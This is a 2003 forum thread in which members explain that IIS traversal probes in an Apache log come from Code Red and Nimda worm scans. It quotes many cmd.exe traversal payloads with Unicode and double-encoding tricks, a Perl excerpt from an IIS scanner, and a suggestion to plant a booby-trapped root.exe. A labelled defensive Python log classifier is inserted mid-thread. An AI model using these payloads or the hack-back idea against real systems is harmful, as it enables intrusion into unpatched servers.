Apache under attack from IIS server?

  1. #1
    Junior Member
    Join Date
    Jul 2003
    Posts
    2

    Apache under attack from IIS server?

    I'm running a little old computer with Apache, and I keep getting some very interesting logs in the Apache access.log file...

    [ip] - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
    [ip] - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
    [ip] - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    [ip] - - [18/11/03:12:36:11 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    [ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    [ip] - - [18/11/03:12:36:12 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
    [ip] - - [18/11/03:12:36:12 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
    [ip] - - [18/11/03:12:36:12 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    [ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    [ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    [ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

    Thankfully all are 404'd or 400'd, but I'm worried that it's doing more than just that. I'm actually worried that it's in the system. I'm behind two firewalls [software and hardware], but I still feel insecure about it. I want to run Apache though, because I host a few documents off of it...

    If anyone can tell me what's happening in those logs and what could be the attacking party, it would help, because this shows up a lot in my logs!


    Thanks for your time in reading this;

    NeoThermic

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    It's a worm.

    Or several worms.

    It's perfectly normal, and happens to all Apache servers on the web all the time. You can safely ignore it.

    Slarty

  3. #3
    Junior Member
    Join Date
    Jul 2003
    Posts
    2
    Hmm... so what are they after? There is no root.exe on my computer...

    NeoThermic

  4. #4
    Junior Member
    Join Date
    Aug 2003
    Posts
    5
    As Slarty says, it's probably a worm, so they are not after you specifically. The worm is searching for any vulnerable computer.

  5. #5
    Just a Virtualized Geek
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Originally posted here by NeoThermic
    Hmm... so what are they after? There is no root.exe on my computer...

    NeoThermic
    They are after any machine that has the following conditions met:

    a) port 80 open
    b) running IIS
    c) vulnerable version of IIS

    Since you only meet one condition, you're not going to be affected. It's likely one of the following types of worms/scanners (a quick visit to Google will help you with info on them):

    Code Red
    Code Red II
    nimda
    Traversal Directory worm (new?)
    Traversal Directory scanner

  6. #6
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    Unpatched IIS servers are vulnerable to a directory traversal using Unicode (..%c1%1c). These worms, the most common being the Code Red variety, don't bother to check if you're running IIS or not; they just run their scripts. You can expect to see this many more times. It's pitiful how many people don't patch their machines, but for you it really is nothing to worry about.

    root.exe is nothing more than cmd.exe renamed and placed in a web directory that executables are allowed to run in, to make it easier to break in later on.

  7. #7
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    And again... this is no worm, just an IIS scanner looking for the Unicode hole or even a cracked IIS.
    (copy of cmd.exe -> root.exe to bypass the output restrictions)
    Well, I think I've got a deja vu?

  8. #8
    Senior Member
    Join Date
    Mar 2003
    Location
    central il
    Posts
    1,779
    Fun little game is to create a root.exe file in the requested directory. Now they will execute that file; I am sure if you control what it does on execution you can have a lot of fun with it.

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    Stranger, I have to disagree. Code Red doesn't check for an IIS string while most automated tools do, and if you mean some sk just scanning a broad range of IPs without checking, I think the number of infected servers is far greater than kiddies doing that (although I could be wrong; I'm making this judgement based on people I know):

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    # Server string subroutine (excerpt from the scanner; &connect, @results
    # and &exit are defined elsewhere in the tool).
    sub server {
        my $X;
        print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
        print "\nTrying to obtain IIS Server string ...";
        $probe = "string";
        my $output;
        my $webserver = "something";
        &connect;
        for ($X=0; $X<=10; $X++){
            $output = $results[$X];
            if (defined $output){
                if ($output =~/IIS/){ $webserver = "iis" };
            };
        };
        if ($webserver ne "iis"){
            print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING.";
            print "\nThis Server may not be running Micro\$oft IIS WebServer";
            print "\nand therefore may not be exploitable using the";
            print "\nUnicode Bug.";
            print "\n\n\nDo You Wish To Cont ... [Y/N]";
            my $choice = <STDIN>;
            chomp $choice;
            if ($choice =~/N/i) {&exit};
        }else{
            print "\n\nOK ... It Seems To Be Micro\$oft IIS.";
        };
    }

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    although the GET requests are identical line for line

    http://isp-lists.isp-planet.com/isp-.../msg00005.html

    and from http://cis.tamu.edu/security/microsoft/Nimda.html

    DETAILS OF IIS PROPAGATION:
    A short example of the IIS probes launched by the worm is shown below. These logs were captured by an Apache web server. Note that the pattern repeats itself; some reports indicate that the 16-probe sequence will be repeated against a single target as many as 13 times. Note that the first two attacks show the worm attempting to exploit the root.exe backdoor left by Code Red II or possibly Sadmind infections. The next set of two attacks are also targeting Code Red II backdoors where the root C: and D: drives are mapped to IIS virtual folders, allowing access to cmd.exe.


    "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
    "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
    "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
    etc, etc.


    it's deja vu all over again... Yogi Berra
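As an added defender's example (not code from this thread or any of its posters), here is a small Python classifier that parses constructed Apache common-log lines like the ones quoted above and tags the probe types the thread describes: the root.exe backdoor, the C:/D: drive mappings, and the Unicode and double-decode traversal encodings. The decode_like_iis helper also shows why %255c only becomes a backslash after a second percent-decode. The sample log, the label names and the function names are all assumptions made up for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.1 - - [18/Nov/2003:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
10.0.0.1 - - [18/Nov/2003:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
10.0.0.1 - - [18/Nov/2003:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
10.0.0.1 - - [18/Nov/2003:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
10.0.0.2 - - [18/Nov/2003:12:40:00 +0000] "GET /index.html HTTP/1.1" 200 1043
"""

# client, date, method, path, status, bytes (Common Log Format)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Overlong UTF-8 sequences that IIS's Unicode traversal bug treated as slashes.
UNICODE_SLASHES = ("%c0%af", "%c0%2f", "%c1%1c", "%c1%9c")
# Encodings that only become a slash after a second decode (double-decode bug).
DOUBLE_DECODED = ("%255c", "%252f", "%%35%63", "%%35c", "%25%35%63")

def decode_like_iis(path):
    """Percent-decode twice, as the double-decode bug did: %255c -> %5c -> '\\'."""
    return unquote(unquote(path))

def classify(path):
    """Label a request path that matches one of the thread's probe patterns, else None."""
    p = path.lower()
    if "root.exe" in p:
        return "codered2-backdoor"      # cmd.exe copied into a script dir by Code Red II
    if p.startswith(("/c/winnt/", "/d/winnt/")):
        return "drive-mapped-cmd"       # C:/D: roots exposed as IIS virtual folders
    if any(s in p for s in UNICODE_SLASHES):
        return "unicode-traversal"
    if any(s in p for s in DOUBLE_DECODED):
        return "double-decode-traversal"
    return None

def scan_log(text):
    """Parse CLF lines and return (client, path, status, label) for each probe found."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _, _, path, status, _ = m.groups()
        label = classify(path)
        if label:
            hits.append((client, path, int(status), label))
    return hits
```

Run scan_log over a real access.log to get one tuple per probe line; counting labels per client IP separates a worm sweep (the full repeating sequence from one source) from a one-off request.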

  10. #10
    Senior Member
    Join Date
    Aug 2003
    Posts
    185


    @tedob you are right... I checked my Apache logs and on getting scanned there were a lot more tryouts.

    Aaah... there it is: http://www.antionline.com/showthread...hreadid=250942
